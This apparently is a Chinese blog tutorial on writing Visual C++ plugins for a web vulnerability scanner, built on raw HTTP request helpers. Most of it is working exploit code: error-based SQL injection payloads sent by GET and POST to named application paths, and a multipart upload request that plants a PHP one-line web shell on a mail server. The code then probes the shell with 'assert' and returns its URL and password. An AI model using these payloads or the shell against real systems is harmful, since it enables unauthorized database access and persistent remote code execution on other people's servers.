vc每次更新都需要重新 编译一次。好麻烦的说
首先构建一个get请求和post请求的类
void GetRequest(char *url,BOOL bRecv,BOOL bSmall) { //构造get请求包 CString enUrl=url; enUrl.Replace(" ","%20");; CString GetPackage=""; CString cookieValue=""; cookie!="" ? cookieValue ="Cookie: "+cookie+"\r\n" : cookieValue=""; GetPackage.Format("GET %s%s HTTP/1.1\r\n" "Accept: */*\r\n" "Accept-Language: zh-cn\r\n" //"Accept-Encoding: gzip, deflate\r\n" "User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)\r\n" "%s" "Host: %s\r\n\r\n", m_strWebRoot,enUrl,cookieValue,m_strHost.GetBuffer(0) ); //AfxMessageBox(GetPackage); //目录名 和 链接都有可能,所以对整个包进行编码 CString encodedPack=""; if (defaultCharset=="utf") { encodedPack=EncodeHanzi(GetPackage,CP_ACP,CP_UTF8); }else{ encodedPack=EncodeHanzi(GetPackage,CP_ACP,CP_ACP); } //AfxMessageBox("send to target"); sendToTarget(encodedPack.GetBuffer(0),bRecv,bSmall); } void PostRequest(char *url, char *data,BOOL bRecv) { //构造Post请求包 CString enUrl=url; enUrl.Replace(" ","%20"); // enUrl.Replace("&","$_and_$"); // enUrl=CParser::UrlEncode(enUrl); // enUrl.Replace("$_and_$","&"); CString PostPackage=""; CString cookieValue=""; cookie!="" ? cookieValue ="Cookie: "+cookie+"\r\n" : cookieValue=""; //对可能有的中文进行编码 CString encodedUrl="",encodedData=""; if (defaultCharset=="utf8") { encodedUrl=EncodeHanzi(enUrl,CP_ACP,CP_UTF8); encodedData=EncodeHanzi(data,CP_ACP,CP_UTF8); }else{ encodedUrl=EncodeHanzi(enUrl,CP_ACP,CP_ACP); encodedData=EncodeHanzi(data,CP_ACP,CP_ACP); } PostPackage.Format("POST %s%s HTTP/1.1\r\n" "Accept: */*\r\n" "Content-Type: application/x-www-form-urlencoded\r\n" "Host: %s\r\n%s" //"Accept-Encoding: gzip, deflate\r\n" "Content-Length: %d\r\n" "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36\r\n\r\n%s", m_strWebRoot,encodedUrl,m_strHost.GetBuffer(0),cookieValue.GetBuffer(0),encodedData.GetLength(),encodedData); sendToTarget(PostPackage.GetBuffer(0),bRecv); }
然后对其进行定义参数
void makePostRequest(char *url, char *data,BOOL bRecv=FALSE); //url 数据 是否接收服务器返回数据 void makeGetRequest(char *url,BOOL bRecv=FALSE,BOOL bSmall=FALSE); //url 数据 是否接收服务器返回数据
然后我们再单独调用分别对GET以及Post的请求
首先是GET请求的:漏洞来源http://0day5.com/archives/3021
GetRequest("/wap/?action=show&mod=admin%20where%20userid=1%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28version(),floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23",TRUE); //发送请求以及确定要接收服务器返回的参数 //GET请求 CString strRet=getInfo("Duplicate entry '(.*?)'"); //使用正则进行匹配 if (strRet!="") //如果strRet不为空表示存在注入 { return "/wap/?action=show&mod=admin where userid存在显错式注入! 版本"+strRet; }
再来看一个POST请求的,漏洞详情,请关注:http://0day5.com/archives/3028
PostRequest("/delete_cart_goods.php","id=1%20and%20(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)",TRUE); //PostRequest(url,data,ture/false) strRet=getInfo("Duplicate entry '(.*?)'"); if (strRet!="") { return "/delete_cart_goods.php id存在post显错式注入! 版本"+strRet; }
还有一个上传的方式。漏洞详情,请关注:http://0day5.com/archives/3039
它的数据包是这个样子的
POST http://mail.domain.com:889/src/big_att_upload.php HTTP/1.1 Host: mail.domain.com:889 Connection: keep-alive Content-Length: 658 Origin: http://mail.domain.com:889 User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36 Content-Type: multipart/form-data; boundary=----------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5 Accept: */* Referer: http://mail.domain.com:889/src/write_mail.php Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4 Cookie: PHPSESSID=outb98m2mckt5a03pejd1aqra0; _HICOM[LANGUAGE]=zh-cn ------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5 Content-Disposition: form-data; name="Filename" vultest.php ------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5 Content-Disposition: form-data; name="PHPSESSID" outb98m2mckt5a03pejd1aqra0 ------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5 Content-Disposition: form-data; name="dir" /var/www/newmail/ ------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5 Content-Disposition: form-data; name="Filedata"; filename="vultest.php" Content-Type: application/octet-stream 12345 ------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5 Content-Disposition: form-data; name="Upload" Submit Query ------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5--
我们把它分成头部还有内容两个部分
头部是这样子的
POST http://mail.domain.com:889/src/big_att_upload.php HTTP/1.1 Host: mail.domain.com:889 Connection: keep-alive Content-Length: 658 Origin: http://mail.domain.com:889 User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36 Content-Type: multipart/form-data; boundary=----------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5 Accept: */* Referer: http://mail.domain.com:889/src/write_mail.php Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4 Cookie: PHPSESSID=outb98m2mckt5a03pejd1aqra0; _HICOM[LANGUAGE]=zh-cn
内容部分是这个样子的
------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5 Content-Disposition: form-data; name="Filename" vultest.php ------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5 Content-Disposition: form-data; name="PHPSESSID" outb98m2mckt5a03pejd1aqra0 ------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5 Content-Disposition: form-data; name="dir" /var/www/newmail/ ------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5 Content-Disposition: form-data; name="Filedata"; filename="vultest.php" Content-Type: application/octet-stream 12345 ------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5 Content-Disposition: form-data; name="Upload" Submit Query ------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5--
然后就好办了,对其进行转码~\r\n转换为\\r\\n ""记得转为\"
CString uploadPack="",uploadHead="",uploadBody="";//首先我们定义个数据包,数据的头部和数据的内容 uploadBody="------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5\r\nContent-Disposition: form-data; name=\"Filename\"\r\n\r\nguige.php\r\n------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5\r\nContent-Disposition: form-data; name=\"PHPSESSID\"\r\n\r\noutb98m2mckt5a03pejd1aqra0\r\n------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5\r\nContent-Disposition: form-data; name=\"dir\"\r\n\r\n/var/www/newmail/\r\n------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5\r\nContent-Disposition: form-data; name=\"Filedata\"; filename=\"shell.php\"\r\nContent-Type: application/octet-stream\r\n\r\n<?php @$_GET[0](@$_REQUEST[1]);?>\r\n------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5\r\nContent-Disposition: form-data; name=\"Upload\"\r\n\r\nSubmit Query\r\n------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5--"; //这里是数据的内容 uploadHead.Format("POST /src/big_att_upload.php HTTP/1.1\r\nHost: %s\r\nConnection: keep-alive\r\nContent-Length: %d\r\nOrigin: http://%s\r\nUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36\r\nContent-Type: multipart/form-data; boundary=----------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5\r\nAccept: */*\r\nReferer: http://%s/src/write_mail.php\r\nCookie: PHPSESSID=outb98m2mckt5a03pejd1aqra0; _HICOM[LANGUAGE]=zh-cn\r\n\r\n", //数据的头部 m_strHost,uploadBody.GetLength(),m_strHost,m_strHost); //得出数据的地址,内容,以及长度 uploadPack=uploadHead+uploadBody; //对数据进行拼接组合起来 sendToTarget(uploadPack.GetBuffer(0),TRUE); //发送数据 //判断一句话是否存在 makePostRequest("/shell.php?0=assert","1=echo 1;",TRUE); if(GetResponseContent().Find("1",0)!=-1){ return "http://"+m_strHost+m_strWebRoot+"/guige.php?0=assert 密码1"; }